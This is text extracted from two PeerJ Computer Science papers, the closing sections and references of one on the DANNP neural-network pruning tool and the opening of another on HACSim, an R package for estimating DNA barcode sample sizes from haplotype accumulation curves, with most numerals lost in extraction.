doi: . /peerjcs. /fig- alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. with wdbc, pp, and md being the exceptions. given that many fs methods are heuristics when solving the combinatorial problem of fs, the results obtained by these methods and ann pruning depends on the dataset and therefore, a specific method may be better than the others for a particular dataset. however, results in fig. demonstrate that ann pruning is not only useful for reducing the complexity of the model, but also to get new insights about the data by being able to select and rank the relevant features. we point out that fs through the ann pruning is a side benefit of the pruning process. conclusion the simplification of ann structures through pruning is of great importance in reducing the overfitting during the training and in deriving more robust models. although several ann pruning algorithms have been proposed, these algorithms are unable to cope with more complex ann structures in an acceptable amount of time if the performance of the pruned network has to be preserved. the obs algorithm is among the most accurate pruning algorithms for anns. overall, the main bottleneck of ann pruning algorithms based on obs is the computation of the h-inverse for the pruning of each weight. to address this problem, we implemented dannp, an efficient tool for ann pruning that implements a parallelized version of the algorithm for faster a calculation of the approximation of the h-inverse. the dannp tool provides four ann pruning algorithms, namely, obs-parallel, uobs-parallel, mwobs-parallel, and mp. we considered datasets from different application domains and showed that mitigation of overfitting using ann pruning might lead to comparable or even better accuracy compared to fully connected anns. although we have tested our tool on a set of selected datasets, we believe that it is able to cope with problems from different domains and is suitable for small to medium size data regarding the number of features and data instances. we assessed the running times and performance of the implemented pruning algorithms. our obs-parallel algorithm was able to speed up the ann pruning by up to eight times compared to the serial implementation of the obs algorithm in a -core machine. moreover, we show that mwobs-parallel produces competitive results to other pruning algorithms while considerably reducing the running time. regarding the effects of pruning on the performance, in eight out of the datasets, the pruned anns result in a significant reduction in the number of weights by % – % compared to those of the unpruned anns. although results show that the effects of the ann pruning depend on the dataset, the pruned ann models maintained comparable or better model accuracy. finally, we show that through ann pruning, input features may lose all outgoing weights to the hidden layer, resulting in the selection of features more relevant for the problem in question. we evaluated the selected features from ann pruning and demonstrated that this set is comparable in its discriminative capabilities as the feature sets obtained by the seven considered state-of-the-art methods for fs. although fs methods may be used to rank the features based on different statistical measures, we ranked the remaining features considering the sum of the absolute values of their associated network weights. therefore, the selection of relevant features and the ranking resulting alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. from the ann pruning provides the user with more information about the classification problem at hand. the dannp tool can cope with complex and medium size datasets. acknowledgements we would like to thank john hanks for his suggestions during the implementation of the dannp tool and robert hoehndorf for discussions on the manuscript. additional information and declarations funding this work was supported by king abdullah university of science and technology (kaust) through the baseline fund bas/ / - - for vladimir b. bajic. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: king abdullah university of science and technology (kaust): bas/ / - - . competing interests vladimir b. bajic is an academic editor for peerj. author contributions • mona alshahrani conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper, development of the online tool. • othman soufan conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, reviewed drafts of the paper, development of the online tool. • arturo magana-mora performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper, development of the online tool. • vladimir b. bajic conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the computational bioscience research center, kaust data is available as a supplemental file, and other raw data is at zenodo: https://zenodo.org/record/ . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information https://zenodo.org/record/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. references almeida js. . predictive non-linear modeling of complex data by artificial neural networks. current opinion in biotechnology ( ): – doi . /s - ( ) - . amdahl gm. . validity of the single processor approach to achieving large scale computing capabilities. afips conference proceedings : – doi . / . . anguita d, ghio a, oneto l, parra x, reyes-ortiz jl. . a public domain dataset for human activity recognition using smartphones. in: th european symposium on artificial neural networks, computational intelligence and machine learning, esann, bruges, belgium. ashoor h, magana-mora a, jankovic br, kamau a, awara k, chowdary r, archer jac, bajic vb. . recognition of translation initiation sites in arabidopsis thaliana. in: lecca p, tulpan d, rajaraman k, eds. systemic approaches in bioin- formatics and computational systems biology: recent advances. hershey, pa: igi publishing, – . bajic vb, seah sh, chong a, zhang g, koh jl, brusic v. . dragon promoter finder: recognition of vertebrate rna polymerase ii promoters. bioinformatics ( ): – doi . /bioinformatics/ . . . bajic vb, tan sl, suzuki y, sugano s. . promoter prediction analysis on the whole human genome. nature biotechnology : – doi . /nbt . bajic vb, werner t. . promoter prediction. in: encyclopedia of genetics, genomics, proteomics and bioinformatics, part bioinformatics, . . gene finding and gene structure. vol. . new york: john wiley & sons, ltd., – . basheer ia, hajmeer m. . artificial neural networks: fundamentals, comput- ing, design, and application. journal of microbiological methods ( ): – doi . /s - ( ) - . becker s, plumbley m. . unsupervised neural network learning procedures for feature extraction and classification. applied intelligence ( ): – doi . /bf . bishop cm. . pattern recognition and machine learning. vol. . new york: springer- verlag. blackford ls, demmel j, dongarra j, duff i, hammarling s, henry g, heroux m, kaufman l, lumsdaine a, petitet a, pozo r, remington k, whaley rc. . an updated set of basic linear algebra subprograms (blas). acm transactions on mathematical software ( ): – doi . / . . brown g, pocock a, zhao m-j, luján m. . conditional likelihood maximisation: a unifying framework for information theoretic feature selection. the journal of machine learning research ( ): – . burden f, winkler d. . bayesian regularization of neural networks. artificial neural networks: methods and applications : – . cybenko g. . approximation by superpositions of a sigmoidal function. mathemat- ics of control, signals and systems : – doi . /bf . alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . /nbt http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /bf http://dx.doi.org/ . / . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. dias fm, antunes a, mota am. . artificial neural networks: a review of com- mercial hardware. engineering applications of artificial intelligence ( ): – doi . /j.engappai. . . . dong m, zhou x-s. . knowledge discovery in corporate events by neural network rule extraction. applied intelligence ( ): – doi . /s - - - . fernandez-delgado m, cernadas e, barro s. . do we need hundreds of classifiers to solve real world classification problems? journal of machine learning research ( ): – . fleuret f. . fast binary feature selection with conditional mutual information. the journal of machine learning research : – . gan r, chen n, huang d. . comparisons of forecasting for hepatitis in guangxi province, china by using three neural networks models. peerj :e doi . /peerj. . gardnera mw, dorlinga sr. . artificial neural networks (the multilayer perceptron)—a review of applications in the atmospheric sciences. atmospheric environment ( – ): – doi . /s - ( ) - . guyon i, elisseeff a. . an introduction to variable and feature selection. the journal of machine learning research : – . hall ma. . correlation-based feature selection for machine learning. hamilton: the university of waikato. hassibi b, stork dg, wolff gj. . optimal brain surgeon and general network pruning. in: ieee international conference on neural networks, , san francisco, ca, usa. doi . /icnn. . . hatzigeorgiou a. . translation initiation start prediction in human cdnas with high accuracy. bioinformatics ( ): – . hernández-serna a, jiménez-segura f. . automatic identification of species with neural networks. peerj :e doi . /peerj. . hornik k, stinchcombe m, white h. . multilayer feedforward networks are universal approximators. neural networks ( ): – doi . / - ( ) - . jayne c, iliadis l, mladenov v. . special issue on the engineering applica- tions of neural networks. neural computing and applications ( ): – doi . /s - - - . johnson b, xie z. . classifying a high resolution image of an urban area using super- object information. isprs journal of photogrammetry and remote sensing : – doi . /j.isprsjprs. . . . kaikhah k, doddameti s. . discovering trends in large datasets using neural networks. applied intelligence ( ): – doi . /s - - - . kalkatawi m, rangkuti f, schramm m, jankovic br, kamau a, chowdary r, archer ja, bajic v. . dragon polya spotter: predictor of poly(a) motifs within human genomic dna sequences [abstract ]. bioinformatics ( ) doi . /bioinformatics/btt . karnin ed. . a simple procedure for pruning back-propagation trained neural net- works. neural networks, ieee transactions on ( ): – doi . / . . alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.engappai. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /icnn. . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.isprsjprs. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /bioinformatics/btt http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. kira k, rendell la. . the feature selection problem: traditional methods and a new algorithm. in: aaai ’ proceedings of the tenth national conference on artificial intelligence, san jose, california—july – , . klima g. . a new approach towards implementing artificial neural networks. lecun y, denker js, solla sa, howard re, jackel ld. . optimal brain damage. in: paper presented at the nips. li z, li y, sun l, tang y, liu l, zhu w. . artificial neural network cascade identifies multi-p inhibitors in natural compounds. peerj :e doi . /peerj. . lichman m. . uci machine learning repository. available at http://archive.ics.uci. edu/ml/index.php. magana-mora a, ashoor h, jankovic br, kamau a, awara k, chowdary r, archer jac, bajic vb. . dragon tis spotter: an arabidopsis-derived pre- dictor of translation initiation sites in plants. bioinformatics ( ): – doi . /bioinformatics/bts . magana-mora a, bajic vb. . omniga: optimized omnivariate decision trees for generalizable classification models. scientific reports :article doi . /s - - - . magana-mora a, kalkatawi m, bajic vb. . omni-polya: a method and tool for accurate recognition of poly(a) signals in human genomic dna. bmc genomics ( ):article doi . /s - - - . meireles mrg, almeida pem, simoes mg. . a comprehensive review for industrial applicability of artificial neural networks. ieee transactions on industrial electronics society ( ): – doi . /tie. . . mozer mc, smolensky p. . skeletonization: a technique for trimming the fat from a network via relevance assessment. in: advances in neural information processing systems. ng ay. . feature selection, l vs. l regularization, and rotational invariance. in: icml ’ proceedings of the twenty-first international conference on machine learning, banff, alberta, canada—july – , . norgaard m, ravn o, poulsen nk. . nnsysid-toolbox for system identification with neural networks. mathematical and computer modelling of dynamical systems ( ): – doi . /mcmd. . . . . nowlan sj, hinton ge. . simplifying neural networks by soft weight-sharing. neural computation ( ): – doi . /neco. . . . . peng h, long f, ding c. . feature selection based on mutual information criteria of max-dependency, max-relevance, and min-redundancy. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . prechelt l. . early stopping—but when? in: neural networks: tricks of the trade. lecture notes in computer science, vol. . berlin, heidelberg: springer, – . reed r. . pruning algorithms-a survey. ieee transactions on neural networks ( ): – doi . / . . riedmiller m. . rprop-description and implementation details. technical report. karlsruhe, university of karlsruhe. alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj. http://archive.ics.uci.edu/ml/index.php http://archive.ics.uci.edu/ml/index.php http://dx.doi.org/ . /bioinformatics/bts http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tie. . http://dx.doi.org/ . /mcmd. . . . http://dx.doi.org/ . /neco. . . . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. schmeier s, jankovic b, bajic vb. . simplified method to predict mutual interac- tions of human transcription factors based on their primary structure. plos one ( ):e doi . /journal.pone. . setiono r, leow wk. . fernn: an algorithm for fast extraction of rules from neural networks. applied intelligence ( – ): – doi . /a: . singh d, febbo pg, ross k, jackson dg, manola j, ladd c, tamayo p, renshaw aa, d’amico av, richie jp. . gene expression correlates of clinical prostate cancer behavior. cancer cell ( ): – doi . /s - ( ) - . soufan o, ba-alawi w, afeef m, essack m, rodionov v, kalnis p, bajic vb. a. mining chemical activity status from high-throughput screening assays. plos one ( ):e doi . /journal.pone. . soufan o, kleftogiannis d, kalnis p, bajic vb. b. dwfs: a wrapper feature selection tool based on a parallel genetic algorithm. plos one ( ):e doi . /journal.pone. . srivastava n, hinton g, krizhevsky a, sutskever i, salakhutdinov r. . dropout: a simple way to prevent neural networks from overfitting. the journal of machine learning research ( ): – . stahlberger a, riedmiller m. . fast network pruning and feature extraction by using the unit-obs algorithm. advances in neural information processing systems : – . tsanas a, little ma, fox c, ramig lo. . objective automatic assessment of rehabil- itative speech treatment in parkinson’s disease. ieee transactions on neural systems and rehabilitation engineering ( ): – doi . /tnsre. . . wan l, zeiler m, zhang s, cun yl, fergus r. . regularization of neural networks using dropconnect. in: proceedings of the th international conference on machine learning (icml- ). wang c-c, tan k-l, chen c-t, keerthi ss, mahajan d, sundararajan s, lin c-j. . distributed newton methods for deep learning. technical report. national taiwan university. wang y, song w, wu j, z zl, mu f, li y, huang h, zhu w, zhang f. . modeling using clinical examination indicators predicts interstitial lung disease among patients with rheumatoid arthritis. peerj :e doi . /peerj. . yang h, moody j. . feature selection based on joint mutual information. in: proceedings of international icsc symposium on advances in intelligent data analysis. yeh ic, lien ch. . the comparisons of data mining techniques for the predictive ac- curacy of probability of default of credit card clients. expert systems with applications ( ): – doi . /j.eswa. . . . alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /a: http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /tnsre. . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. submitted july accepted november published january corresponding author jarrett d. phillips, jphill @uoguelph.ca academic editor gang mei additional information and declarations can be found on page doi . /peerj-cs. copyright phillips et al. distributed under creative commons cc-by . open access hacsim: an r package to estimate intraspecific sample sizes for genetic diversity assessment using haplotype accumulation curves jarrett d. phillips , steven h. french , robert h. hanner and daniel j. gillis school of computer science, university of guelph, guelph, ontario, canada department of integrative biology, biodiversity institute of ontario, university of guelph, guelph, ontario, canada abstract assessing levels of standing genetic variation within species requires a robust sampling for the purpose of accurate specimen identification using molecular techniques such as dna barcoding; however, statistical estimators for what constitutes a robust sample are currently lacking. moreover, such estimates are needed because most species are currently represented by only one or a few sequences in existing databases, which can safely be assumed to be undersampled. unfortunately, sample sizes of – specimens per species typically seen in dna barcoding studies are often insufficient to adequately capture within-species genetic diversity. here, we introduce a novel iterative extrapolation simulation algorithm of haplotype accumulation curves, called hacsim (haplotype accumulation curve simulator) that can be employed to calculate likely sample sizes needed to observe the full range of dna barcode haplotype variation that exists for a species. using uniform haplotype and non-uniform haplotype frequency distributions, the notion of sampling sufficiency (the sample size at which sampling accuracy is maximized and above which no new sampling information is likely to be gained) can be gleaned. hacsim can be employed in two primary ways to estimate specimen sample sizes: ( ) to simulate haplotype sampling in hypothetical species, and ( ) to simulate haplotype sampling in real species mined from public reference sequence databases like the barcode of life data systems (bold) or genbank for any genomic marker of interest. while our algorithm is globally convergent, runtime is heavily dependent on initial sample sizes and skewness of the corresponding haplotype frequency distribution. subjects bioinformatics, computational biology, data science, optimization theory and computation, scientific computing and simulation keywords algorithm, dna barcoding, extrapolation, iterative method, sampling sufficiency, species introduction background earth is in the midst of its sixth mass extinction event and global biodiversity is declining at an unprecedented rate (ceballos et al., ). it is therefore important that species genetic diversity be catalogued and preserved. one solution to address this mounting crisis in a how to cite this article phillips jd, french sh, hanner rh, gillis dj. . hacsim: an r package to estimate intraspecific sample sizes for genetic diversity assessment using haplotype accumulation curves. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:jphill @uoguelph.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. systematic, yet rapid way is dna barcoding (hebert et al., ). dna barcoding relies on variability within a small gene fragment from standardized regions of the genome to identify species, based on the fact that most species exhibit a unique array of barcode haplotypes that are more similar to each other than those of other species (e.g., a barcode ‘‘gap’’). in animals, the dna barcode region corresponds to a bp fragment of the ′ terminus of the cytochrome c oxidase subunit i (coi) mitochondrial marker (hebert et al., ; hebert, ratnasingham & de waard, ). a critical problem since the inception of dna barcoding involves determining appropriate sample sizes necessary to capture the majority of existing intraspecific haplotype variation for major animal taxa (hebert et al., ; meyer & paulay, ; ward et al., ). taxon sample sizes currently employed in practice for rapid assignment of a species name to a specimen, have ranged anywhere from – specimens per species (matz & nielsen, ; ross, murugan & li, ; goodall- copestake, tarling & murphy, ; jin, he & zhang, ; yao et al., ); however, oftentimes only – individuals are actually collected. this trend is clearly reflected within the barcode of life data systems (http://www.boldsystems.org) (ratnasingham & hebert, ), where an overwhelming number of taxa have only a single record and sequence. a fitting comparison to the issue of adequacy of specimen sample sizes can be made to the challenge of determining suitable taxon distance thresholds for species separation on the basis of the dna barcode gap (meyer & paulay, ). it has been widely demonstrated that certain taxonomic groups, such as lepidoptera (butterflies/moths), are able to be readily separated into distinct clusters largely reflective of species boundaries derived using morphology (Čandek & kuntner, ). however, adoption of a fixed limit of % difference between maximum intraspecific distance and minimum interspecific (i.e., nearest-neighbour) divergence is infeasible across all taxa (hebert, ratnasingham & de waard, ; collins & cruickshank, ). species divergence thresholds should be calculated from available sequence data obtained through deep sampling of taxa across their entire geographic ranges whenever possible (young et al., ). there is a clear relationship between specimen sample sizes and observed barcoding gaps: sampling too few individuals can give the impression of taxon separation, when in fact none exists (meyer & paulay, ; hickerson, meyer & moritz, ; wiemers & fiedler, ; dasmahapatra et al., ; Čandek & kuntner, ), inevitably leading to erroneous conclusions (collins & cruickshank, ). it is thus imperative that barcode gap analyses be based on adequate sample sizes to minimize the presence of false positives. introducing greater statistical rigour into dna barcoding appears to be the clear way forward in this respect (nielsen & matz, ; Čandek & kuntner, ; luo et al., ; phillips, gillis & hanner, ). the introduction of computational approaches for automated species delimitation such as generalized mixed yule coalescent (gmyc) (pons et al., ; monaghan et al., ; fujisawa & barraclough, ), automatic barcode gap discovery (abgd) (puillandre, lambert & brouillet, ) and poisson tree processes (ptp) (zhang et al., ) has greatly contributed to this endeavour in the form of web servers (gmyc, abgd, ptp) and r packages (gmyc: species’ limits by threshold statistics, splits (ezard, fujisawa & barraclough, )). phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.boldsystems.org http://dx.doi.org/ . /peerj-cs. various statistical resampling and population genetic methods, in particular coalescent simulations, for the estimation of sample sizes, have been applied to lepidoptera (costa rican skipper butterflies (astraptes fulgerator)) (zhang et al., ) and european diving beetles (agabus bipustulatus) (bergsten et al., ). using wright’s equilibrium island model (wright, ) and kimura’s stepping stone model (kimura & weiss, ) under varying effective population sizes and migration rates, zhang et al. ( ) found that between - specimens per species were necessary to observe % of all estimated coi variation for simulated specimens of a. fulgerator. conversely, real species data showed that a sample size of - individuals is probably needed to capture the majority of coi haplotype variation existing for this species (zhang et al., ). a subsequent investigation carried out by bergsten et al. ( ) found that a random sample of individuals was required to uncover % coi diversity in a. bipustulatus; whereas, a much smaller sample size of specimens was necessary when geographic separation between two randomly selected individuals was maximized. others have employed more general statistical approaches. based on extensive simulation experiments, through employing the central limit theorem (clt), luo et al. ( ) suggested that no fewer than individuals per species be sampled. conversely, using an estimator of sample size based on the method of moments, an approach to parameter estimation relying on the weak law of large numbers (pearson, ), sample sizes ranging from – , individuals across species of ray-finned fishes (chordata: actinopterygii) were found by phillips et al. ( ). haplotype accumulation curves paint a picture of observed standing genetic variation that exists at the species level as a function of expended sampling effort (phillips et al., ; phillips, gillis & hanner, ). haplotype sampling completeness can then be gauged through measuring the slope of the curve, which gives an indication of the number of new haplotypes likely to be uncovered with additional specimens collected. for instance, a haplotype accumulation curve for a hypothetical species having a slope of . suggests that only one previously unseen haplotype will be captured for every individuals found. this is strong evidence that the haplotype diversity for this species has been adequately sampled. thus, further recovery of specimens of such species provide limited returns on the time and money invested to sequence them. trends observed from generated haplotype accumulation curves for the actinopterygian species assessed by phillips et al. ( ), which were far from reaching an asymptote, corroborated the finding that the majority of intraspecific haplotypes remain largely unsampled in actinopterygii for even the best-represented species in bold. estimates obtained from each of these studies stand in sharp contrast to sample sizes typically reported within dna barcoding studies. numerical optimization methods are required to obtain reasonable approximations to otherwise complex questions. many such problems proceed via the iterative method, whereby an initial guess is used to produce a sequence of successively more precise (and hopefully more accurate) approximations. such an approach is attractive, as resulting solutions can be made as precise as desired through specifying a given tolerance cutoff. however, in such cases, a closed-form expression for the function being optimized is known a priori. in many instances, the general path (behaviour) of the search space being phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. explored is the only information known, and not its underlying functional form. in this paper, we take a middle-ground approach that is an alternative to probing sampling completeness on the basis of haplotype accumulation curve slope measurement. to this end, iteration is applied to address the issue of relative sample size determination for dna barcode haplotype sampling completeness, a technique suggested by phillips, gillis & hanner ( ). given that specimen collection and processing is quite a laborious and costly endeavour (cameron, rubinoff & will, ; stein et al., ), the next most direct solution to an otherwise blind search strategy is to employ computational simulation that approximates specimen collection in the field. the main contribution of this work is the introduction of a new, easy-to-use r package implementing a novel statistical optimization algorithm to estimate sample sizes for assessment of genetic diversity within species based on saturation observed in haplotype accumulation curves. here, we present a novel nonparametric stochastic (monte carlo) iterative extrapolation algorithm for the generation of haplotype accumulation curves based on the approach of phillips et al. ( ). using the statistical environment r (r core team, ), we examine the effect of altering species haplotype frequencies on the shape of resulting curves to inform on likely required sample sizes needed for adequate capture of within-species haplotype variation. proof-of-concept of our method is illustrated through both hypothetical examples and real dna sequence data. motivation consider n dna sequences that are randomly sampled for a given species of interest across its known geographic range, each of which correspond to a single specimen. suppose further that h* of such sampled dna sequences are unique (i.e., are distinct haplotypes). this scenario leads naturally to the following question: what is n*, the estimated total number of dna sequence haplotypes that exist for a species θ? put another way, what sample size (number of specimens) is needed to capture the existing haplotype variation for a species? the naïve approach (adopted by phillips et al. ( )) would be to ignore relative frequencies of observed haplotypes; that is, assume that species haplotypes are equally probable in a species population. thus, in the absence of any information, the best one can do is adopt a uniform distribution for the number of sampled haplotypes. such a path leads to obtaining gross overestimates for sufficient sampling (phillips et al., ). a much better approach uses all available haplotype data to arrive at plausible estimates of required taxon sample sizes. this latter method is explored here in detail. methods haplotype accumulation curve simulation algorithm algorithm functions our algorithm, hacsim (short for haplotype accumulation curve simulator), consisting of two user-defined r functions, hac.sim() and hac.simrep(), was created to run simulations of haplotype accumulation curves based on user-supplied parameters. the simulation treats species haplotypes as distinct character labels relative to the number of individuals possessing a given haplotype. the usual convention in this regard is that phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure modified haplotype network from phillips, gillis & hanner ( ). haplotypes are labelled according to their absolute frequencies such that the most frequent haplotype is labelled ‘‘ ’’, the second- most frequent haplotype is labelled ‘‘ ’’, etc., and is meant to illustrate that much species locus variation consists of rare haplotypes at very low frequency (typically only represented by or specimens). thus, species showing such patterns in their haplotype distributions are probably grossly under-respresented in public sequence databases like bold and genbank. full-size doi: . /peerjcs. /fig- haplotype is the most frequent, haplotype is the next most frequent, etc. (gwiazdowski et al., ). a haplotype network represents this scheme succinctly (fig. ). such an implementation closely mimics that seen in natural species populations, as each character label functions as a unique haplotype linked to a unique dna barcode sequence. the algorithm then randomly samples species haplotype labels in an iterative fashion with replacement until all unique haplotypes have been observed. this process continues until all species haplotypes have been sampled. the idea is that levels of species haplotypic variation that are currently catalogued in bold can serve as proxies for total haplotype diversity that may exist for a given species. this is a reasonable assumption given that, while estimators of expected diversity are known (e.g., chao abundance) (chao, ), the frequencies of unseen haplotypes are not known a priori. further, assuming a species is sampled across its entire geographic range, haplotypes not yet encountered are presumed to occur at low frequencies (otherwise they would likely have already been sampled). because r is an interpreted programming language (i.e., code is run line-by-line), it is slow compared to faster alternatives which use compilation to convert programs into machine-readable format; as such, to optimize performance of the present algorithm in terms of runtime, computationally-intensive parts of the simulation code were written in the c++ programming language and integrated with r via the packages rcpp (eddelbuettel & françois, ) and rcpparmadillo (eddelbuettel & sanderson, ). this includes phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. function code to carry out haplotype accumulation (via the function accumulate(), which is not directly called by the user). a further reason for turning to c++ is because some r code (e.g., nested ‘for’ loops) is not easily vectorized, nor can parallelization be employed for speed improvement due to loop dependence. the rationale for employing r for the present work is clear: r is free, open-source software that it is gaining widespread use within the dna barcoding community due to its ease-of-use and well-established user-contributed package repository (comprehensive r archive network (cran)). as such, the creation and disemination of hacsim as a r framework to assess levels of standing genetic variation within species is greatly facilitated. a similar approach to the novel one proposed here to automatically generate haplotype accumulation curves from dna sequence data is implemented in the r package spider (species identity and evolution in r; (brown et al., )) using the haploaccum() function. however, the approach, which formed the basis of earlier work carried out by phillips et al. ( ), is quite restrictive in its functionality and, to our knowledge, is currently the only method available to generate haplotype accumulation curves in r because spider generates haplotype accumulation curves from dna sequence alignments only and is not amenable to inclusion of numeric inputs for specimen and haplotype numbers. thus, the method could not be easily extended to address our question. this was the primary reason for the proposal of a statistical model of sampling sufficiency by phillips et al. ( ) and its extension described herein. algorithm parameters at present, the algorithm (consisting of hac.sim() and hac.simrep()) takes arguments as input (table ). a user must first specify the number of observed specimens/dna sequences (n) and the number of observed haplotypes (i.e., unique dna sequences) (h*) for a given species. both n and h* must be greater than one. clearly, n must be greater than or equal to h*. next, the haplotype frequency distribution vector must be specified. the probs argument allows for the inclusion of both common and rare species haplotypes according to user interest (e.g., equally frequent haplotypes, or a single dominant haplotype). the resulting probs vector must have a length equal to h*. for example, if h*= , probs must contain four elements. the total probability of all unique haplotypes must sum to one. the user can optionally input the fraction of observed haplotypes to capture p. by default, p= . , mirroring the approach taken by both zhang et al. ( ) and bergsten et al. ( ) who computed intraspecific sample sizes needed to recover % of all haplotype variation for a species. at this level, the generated haplotype accumulation curve reaches a slope close to zero and further sampling effort is unlikely to uncover any new haplotypes. however, a user may wish to obtain sample sizes corresponding to different haplotype recovery levels, e.g., p= . ( % of all estimated haplotypes found). in the latter scenario, it can be argued that % of species haplotype variation is never actually achieved, since with greater sampling effort, additional haplotypes are almost surely to be found; thus, a true asymptote is never reached. in any case, simulation completion times will vary phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table parameters inputted (first ) and outputted (last six) by hac.sim() and hac.simrep(), along with their definitions. range refers to plausible values that each parameter can assume within the hap- lotype accumulation curve simulation algorithm. [ and ] indicate that a given value is included in the range interval; whereas, ( and ) indicate that a given value is excluded from the range interval. simulation progress can be tracked through setting progress = true within hachypothetical() or hacreal(). users can optionally specify that a file be created containing all information outputted to the r console (via the argument filename, which can be named as the user wishes). parameter definition range n total number of specimens/dna sequences ( ,∞) h* total number of unique haplotypes ( , n] probs haplotype probability distribution vector ( , ) p proportion of haplotypes to recover ( , ] perms total number of permutations ( ,∞) input.seqs analyze fasta file of species dna sequences true, false conf.level desired confidence level for confidence interval calculation ( , ) h cumulative mean number of haplotypes sampled [ , h∗] h∗−h cumulative mean number of haplotypes not sampled [ , h∗) r= hh∗ cumulative mean fraction of haplotypes sampled ( , ] h∗−h h∗ cumulative mean fraction of haplotypes not sampled [ , ) n∗ mean specimen sample size corresponding to h∗ [ n ,∞) n∗−n mean number of individuals not sampled [ , n] depending on inputted parameter values, such as probs, which controls the skewness of the observed haplotype frequency distribution. the perms argument is in place to ensure that haplotype accumulation curves ‘‘smooth out’’ and tend to h* asymptotically as the number of permutations (replications) is increased. the effect of increasing the number of permutations is an increase in statistical accuracy and consequently, a reduction in variance. the proposed simulation algorithm outputs a mean haplotype accumulation curve that is the average of perms generated haplotype accumulation curves, where the order of individuals that are sampled is randomized. each of these perms curves is a randomized step function (a sort of random walk), generated according to the number of haplotypes found. a permutation size of , was used by phillips et al. ( ) because smaller permutation sizes yielded non-smooth (noisy) curves. permutation sizes larger than , typically resulted in greater computation time, with no noticeable change in accumulation curve behaviour (phillips et al., ). by default, perms = , (in contrast to phillips et al. ( )), which is comparable to the large number of replicates typically employed in statistical bootstrapping procedures needed to ensure accuracy of computed estimates (efron, ). sometimes it will be necessary for users to sacrifice accuracy for speed in the presence of time constraints. this can be accomplished through decreasing perms. doing so however will result in only near-optimal solutions for specimen sample sizes. in some cases, it may be necessary to increase perms to further smooth out the curves (to ensure monotonicity), but this will increase algorithm runtime substantially. should a user wish to analyze their own intraspecific coi dna barcode sequence data (or sequence data from any single locus for that matter), setting input.seqs = phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. true allows this (via the read.dna() function in ape). in such a case, a pop-up file window will prompt the user to select the formatted fasta file of aligned/trimmed sequences to be read into r. when this occurs, arguments for n , h* and probs are set automatically by the algorithm via functions available in the r packages ape (analysis of phylogenetics and evolution) (paradis, claude & strimmer, ) and pegas (population and evolutionary genetics analysis system) (paradis, ). users must be aware however that the number of observed haplotypes treated by pegas (via the haplotype() function) may be overestimated if missing/ambiguous nucleotide data are present within the final alignment input file. missing data are explicitly handled by the base.freq() function in the ape package. when this occurs, r will output a warning that such data are present within the alignment. users should therefore consider removing sequences or sites comprising missing/ambiguous nucleotides. this step can be accomplished using external software such as mega (molecular evolutionary genetics analysis; (kumar, stecher & tamura, )). the barcode standard (hanner, ) was developed to help identify high quality sequences and can be used as a quality filter if desired. exclusion of low-quality sequences also has the advantage of speeding up compution time of the algorithm significantly. options for confidence interval (ci) estimation and graphical display of haplotype accumulation is also available via the argument conf.level, which allows the user to specify the desired level of statistical confidence. cis are computed from the sample α % and ( − α ) % quantiles of the haplotype accumulation curve distribution. the default is conf.level = . 